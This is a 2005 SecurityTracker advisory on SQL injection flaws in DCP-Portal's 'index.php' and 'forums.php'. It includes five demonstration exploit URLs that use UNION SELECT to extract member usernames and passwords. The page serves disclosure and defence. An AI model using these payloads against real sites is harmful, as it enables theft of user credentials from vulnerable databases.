Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
DCP-Portal Input Validation Flaws in 'index.php' and 'forums.php' Let Remote Users Inject SQL Commands
|
|
SecurityTracker Alert ID: 1013216
|
|
SecurityTracker URL: http://securitytracker.com/id?1013216
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Feb 16 2005
|
Impact: Disclosure of system information, Disclosure of user information
|
Version(s): 6.1.1 and prior versions
|
Description: Several input validation vulnerabilities were reported in DCP-Portal. A remote user can inject SQL commands.
The 'index.php' and 'forums.php' scripts do not properly validate user-supplied input in several parameters. If magic_quotes_gpc
is set to off in the 'php.ini' configuration file, then a remote user can submit a specially crafted HTTP request to execute SQL
commands on the underlying database.
Some demonstration exploit URLs are provided:
http://[target]/index.php?page=links&catid=1&lcat=-99%27
UNION SELECT null,password
FROM dcp5_members WHERE username=%27[username]
http://[target]/index.php?page=documents&doc=-99%27
UNION SELECT
null,null,username,password, null,null,null,null,null,null,null,null FROM dcp5_members WHERE username=%27[username]
http://[target]/index.php?page=mdeta
ils&uid=-99%27 UNION SELECT null,null,null,username,null,
null,null,null,password,null,null,null,null,null,null,null,null,null,null,null,null
FROM dcp5_members
WHERE username=%27[username]
http://[target]/forums.php?action=showmsg&mid=-99%27 UNION SELECT null,null,null,password,null,
username,null,null,nu
ll FROM dcp5_members WHERE username=%27[username]
http://[target]/forums.php?action=board&bid=-99%27UNION SELECT null,null,password,null
FROM
dcp5_members WHERE username=%27[username]
The vendor has been notified.
"Exoduks" from HackGen Team reported these
vulnerabilities.
The original advisory is available at:
http://www.hackgen.org/advisories/hackgen-2005-003.txt
|
Impact: A remote user can execute SQL commands on the underlying database.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.dcp-portal.com/ (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any)
|
|
Message History:
None.
|
Source Message Contents
|
|
|
[Original Message Not Available for Viewing]
|
|
Go to the Top of This SecurityTracker Archive Page
|